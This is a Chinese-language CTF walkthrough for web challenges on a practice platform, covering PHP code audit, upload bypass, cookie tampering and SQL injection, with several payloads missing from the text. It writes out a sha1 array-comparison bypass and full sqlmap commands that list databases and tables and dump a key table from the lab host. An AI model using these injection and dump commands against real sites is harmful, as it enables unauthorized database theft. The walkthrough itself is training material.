主要方法
工具
题型2.
貌似有点难
不多说,去看题目吧。
解题链接:
http://ctf5.shiyanbar.com/phpaudit/
解决方法
在请求包里添加如下,然后点击上方
Go
,在左侧Response
就能看到key
了_题型3
因缺思汀的绕过
访问解题链接去访问题目,可以进行答题。根据web题一般解题思路去解答此题。看源码,请求,响应等。提交与题目要求一致的内容即可返回flag。
然后提交正确的flag
即可得分。
flag格式 CTF{}
解题链接:
http://ctf5.shiyanbar.com/web/pcat/index.php
第一个输入框键入以下,然后提交
题型4
题型5
猫捉老鼠
题型6
上传绕过
改成以下形式,123
题型7
简单的sql注入2
提交如下
题型8
Cookie
Guess Next Session
随意传入一个值,然后抓包,删除以下两个地方,然后Go
题型9
FALSE
PHP代码审计
hint:sha1函数你有认真了解过吗?听说也有人用md5碰撞o(╯□╰)o
格式:CTF{}
解题链接:
http://ctf5.shiyanbar.com/web/false.php
在连接后面添加
?name[]=a&password[]=b
由于
sha
默认字符串,这里改成数组,两个是false
的,然后就是正确的了sql注入
这个看起来有点简单!
解题链接:
http://ctf5.shiyanbar.com/8/index.php?id=1
在链接后面加一个单引号'
,返回错误,可以看到后台是mysql
数据库,然后构造 and 1=1
and 1=2
用sqlmap
注入,在sqlmap文件夹打开命令行,然后执行以下命令
查看所有数据库
python sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" --dbs
查看某个数据库的表
python sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db --tables
查看列
python sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey --columns
显示内容(详细信息)
python sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey -C k0y --dump
网友评论